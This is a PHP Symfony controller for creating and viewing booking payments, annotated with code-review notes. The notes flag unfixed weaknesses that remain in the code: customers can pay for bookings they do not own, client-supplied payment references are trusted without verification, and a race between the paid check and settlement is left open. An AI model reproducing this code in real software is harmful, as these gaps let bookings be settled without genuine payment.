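<?php

namespace AppBundle\Controller\Api;

use AppBundle\Entity\Booking;
use AppBundle\Entity\Payment;
use AppBundle\Entity\PaymentService;
use AppBundle\Entity\Staff;
use AppBundle\Form\BookingType;
use FOS\RestBundle\Controller\Annotations as Rest;
use FOS\RestBundle\Controller\FOSRestController;
use Nelmio\ApiDocBundle\Annotation as Doc;
use Sensio\Bundle\FrameworkExtraBundle\Configuration\ParamConverter;
use Sensio\Bundle\FrameworkExtraBundle\Configuration\Security;
use Symfony\Component\HttpFoundation\JsonResponse;
use Symfony\Component\HttpFoundation\Request;
use Symfony\Component\HttpFoundation\Response;

/**
 * REST endpoints for the payments attached to a booking.
 *
 * Listing and reading payments is restricted to operators. A payment is
 * created either by an operator (cash or remote, reference optional) or by a
 * customer (remote only, reference required). Update and delete are always
 * refused with 403.
 *
 * Every failure returns a JSON object with a single "Error" key.
 */
class BookingPaymentController extends FOSRestController
{
    /**
     * @Rest\Get("/bookings/{bookingId}/payments")
     * @Rest\View(
     *     statusCode = Response::HTTP_OK,
     *     SerializerGroups = {"LIST", "PAYMENT_DETAILS"}
     * )
     * @Security("has_role('ROLE_OPERATOR')")
     * @Doc\ApiDoc(
     *     section="Pay for a booking",
     *     resource=true,
     *     description="Show the payments related to a booking (the list may contain zero or one item).",
     * )
     *
     * Lists every Payment row whose booking is the converted {bookingId}.
     *
     * @param Booking $booking resolved from the {bookingId} route parameter
     *
     * @return Payment[]
     */
    public function listAction(Booking $booking)
    {
        return $this
            ->getDoctrine()
            ->getManager()
            ->getRepository('AppBundle:Payment')
            ->findByBooking($booking);
    }

    /**
     * @Rest\Get("/bookings/{bookingId}/payments/{paymentId}")
     * @Rest\View(
     *     statusCode = Response::HTTP_OK,
     *     SerializerGroups = {"LIST", "PAYMENT_DETAILS"}
     * )
     * @Security("has_role('ROLE_OPERATOR')")
     * @Doc\ApiDoc(
     *     section="Pay for a booking",
     *     resource=true,
     *     description="Show a particular payment.",
     * )
     *
     * Returns the Payment resolved from {paymentId}.
     *
     * NOTE(review): only {paymentId} is converted; the {bookingId} in the URL
     * is never checked against the payment, so any payment id is readable under
     * any booking path. Harmless while the route is operator-only, but worth
     * tightening if the role is ever relaxed.
     *
     * @param Payment $payment resolved from the {paymentId} route parameter
     *
     * @return Payment
     */
    public function showAction(Payment $payment)
    {
        return $payment;
    }

    /**
     * The body of the request must be either <br ><br >
     * For Cash payment: <br>
     * { <br >
     *   "paymentServiceId": Z, <br >
     *   "amount": W <br >
     * } <br ><br>
     * or <br > <br >
     * Remote payment: <br>
     * { <br >
     *   "paymentServiceId": Z, <br >
     *   "paymentReference": Z, <br >
     *   "amount": W <br >
     * } <br >
     * <br >
     *
     * NOTE: the X-Auth-Token identifies the user making the payment.
     *
     * @Rest\Post("/bookings/{bookingId}/payments")
     * @Rest\View(
     *     statusCode = Response::HTTP_CREATED,
     *     SerializerGroups = {"LIST", "PAYMENT_DETAILS"}
     * )
     * @Doc\ApiDoc(
     *     section="Pay for a booking",
     *     resource=true,
     *     description="Pay for a booking.",
     * )
     * @Security("has_role('ROLE_CUSTOMER') or has_role('ROLE_OPERATOR')")
     *
     * Validates the request, then hands over to the payment_manager service.
     *
     * Rules enforced here:
     *  - "amount" and "paymentServiceId" are mandatory;
     *  - "amount" must be numeric and equal (to the cent) to the travel's sit cost;
     *  - a cash payment service may only be used by an operator;
     *  - a customer must supply "paymentReference"; an operator may omit it
     *    (cash deposit taken at the desk);
     *  - a booking that is already paid is refused.
     *
     * @param Request $request
     * @param Booking $booking resolved from the {bookingId} route parameter
     *
     * @return Payment|JsonResponse the created payment, or a 4xx JSON error
     */
    public function createAction(Request $request, Booking $booking)
    {
        $checker        = $this->get('security.authorization_checker');
        $paymentManager = $this->get('payment_manager');
        $em             = $this->getDoctrine()->getManager();

        // Only an operator is recorded on the payment. For a customer $operator
        // stays null, and that null is what switches on the stricter rules below
        // (remote-only service, reference mandatory).
        $operator = null;
        if ($checker->isGranted('ROLE_OPERATOR')) {
            $operator = $this->get('security.token_storage')->getToken()->getUser();
        }

        // NOTE(review): nothing here ties $booking to the authenticated customer.
        // A ROLE_CUSTOMER token can POST a payment for any bookingId it can
        // guess and thereby mark that booking as paid. Ownership should be
        // enforced here (or in a voter) once Booking exposes its owner — TODO confirm.

        // --- amount ---------------------------------------------------------
        if (!$request->request->has('amount')) {
            return self::error('missing "amount"', JsonResponse::HTTP_BAD_REQUEST);
        }
        $paymentAmount = $request->request->get('amount'); // the amount of the actual deposit
        // Rejects arrays, booleans, "" and "5000abc" up front; is_numeric() is
        // also the precondition for amountsMatch() below.
        if (!is_numeric($paymentAmount)) {
            return self::error('"amount" must be a number', JsonResponse::HTTP_BAD_REQUEST);
        }

        // --- payment service ------------------------------------------------
        if (!$request->request->has('paymentServiceId')) {
            return self::error('missing "paymentServiceId"', JsonResponse::HTTP_BAD_REQUEST);
        }
        $paymentServiceId = $request->request->get('paymentServiceId');
        // A nested value would blow up in find() and in the error string below.
        if (!is_scalar($paymentServiceId)) {
            return self::error('"paymentServiceId" must be a scalar', JsonResponse::HTTP_BAD_REQUEST);
        }
        $paymentService = $em
            ->getRepository('AppBundle:PaymentService')
            ->find($paymentServiceId);
        if ($paymentService === null) {
            return self::error(
                'no paymentService with id: ' . $paymentServiceId,
                JsonResponse::HTTP_NOT_FOUND
            );
        }
        // Loose == kept on purpose: the declared types of TYPE_CASH and of the
        // type column are not visible from here.
        if ($paymentService->getType() == PaymentService::TYPE_CASH && $operator === null) {
            return self::error(
                'customers pay online only with e_payments',
                JsonResponse::HTTP_BAD_REQUEST
            );
        }

        // --- payment reference ----------------------------------------------
        $reference = null;
        if ($request->request->has('paymentReference')) {
            $rawReference = $request->request->get('paymentReference');
            if (!is_scalar($rawReference)) {
                return self::error('"paymentReference" must be a scalar', JsonResponse::HTTP_BAD_REQUEST);
            }
            // An empty string is treated as "not supplied".
            $reference = ($rawReference === '') ? null : $rawReference;
        }
        if ($reference === null && $operator === null) {
            // A customer can only pay remotely, and a remote payment needs the
            // provider's reference number. Operators may omit it for a cash deposit.
            return self::error('missing "paymentReference"', JsonResponse::HTTP_BAD_REQUEST);
        }

        // --- booking state ----------------------------------------------------
        if ($paymentManager->isPaid($booking)) {
            return self::error('Booking already paid', JsonResponse::HTTP_BAD_REQUEST);
        }
        // NOTE(review): isPaid() and finishPayment() are two separate calls with
        // no lock or transaction visible here; two concurrent POSTs for the same
        // booking can both pass this check. Confirm that payment_manager (or a DB
        // unique constraint) prevents a double payment.

        $sitCost = $booking->getTravel()->getSitCost(); // the price of the sit
        if (!self::amountsMatch($sitCost, $paymentAmount)) {
            // Was a 404 with a "less than required" message; the amount may be
            // higher as well as lower, and it is a client input error, not a
            // missing resource.
            return self::error(
                sprintf(
                    'the paid amount does not match the required one: paid=>%s ; sitCost=>%s',
                    $paymentAmount,
                    $sitCost
                ),
                JsonResponse::HTTP_BAD_REQUEST
            );
        }

        // NOTE(review): $reference is taken on trust from the client and is not
        // verified against the payment service before the booking is settled.
        // Unless payment_manager->finishPayment() verifies it server-side (not
        // visible here), a customer can settle a booking by posting an arbitrary
        // reference.
        return $paymentManager->finishPayment(
            $booking,
            $paymentService,
            $paymentAmount,
            $reference,
            $operator
        );
    }

    /**
     * @Rest\Put("/bookings/{bookingId}/payments/{paymentId}")
     * @Rest\View(
     *     statusCode = Response::HTTP_ACCEPTED,
     *     SerializerGroups = {"LIST", "PAYMENT_DETAILS"}
     * )
     *
     * Payments are immutable: every PUT is refused with 403.
     *
     * @param Booking $booking resolved from the {bookingId} route parameter (unused)
     *
     * @return JsonResponse
     */
    public function updateAction(Booking $booking)
    {
        return self::error('update forbidden', JsonResponse::HTTP_FORBIDDEN);
    }

    /**
     * @Rest\Delete("/bookings/{bookingId}/payments/{paymentId}")
     * @Rest\View(
     *     statusCode = JsonResponse::HTTP_OK
     * )
     *
     * Payments cannot be removed through the API: every DELETE is refused with 403.
     *
     * @param Booking $booking resolved from the {bookingId} route parameter (unused)
     *
     * @return JsonResponse
     */
    public function deleteAction(Booking $booking)
    {
        return self::error('delete forbidden', JsonResponse::HTTP_FORBIDDEN);
    }

    /**
     * Build the uniform {"Error": message} response used by this controller.
     *
     * @param string $message
     * @param int    $status  HTTP status code
     *
     * @return JsonResponse
     */
    private static function error($message, $status)
    {
        return new JsonResponse(['Error' => $message], $status);
    }

    /**
     * Compare two monetary amounts after normalising both to two decimals.
     *
     * "5000", 5000 and "5000.00" agree; a strict comparison of the raw values
     * would not, while PHP 7's loose == also accepts "5000abc" == 5000, which
     * is why the original `$sitCost == $paymentAmount` was unsafe on client input.
     * Callers must have validated $actual with is_numeric() first.
     *
     * @param int|float|string $expected the sit cost as returned by the entity
     * @param int|float|string $actual   the client-supplied amount
     *
     * @return bool
     */
    private static function amountsMatch($expected, $actual)
    {
        return number_format((float) $expected, 2, '.', '')
            === number_format((float) $actual, 2, '.', '');
    }
}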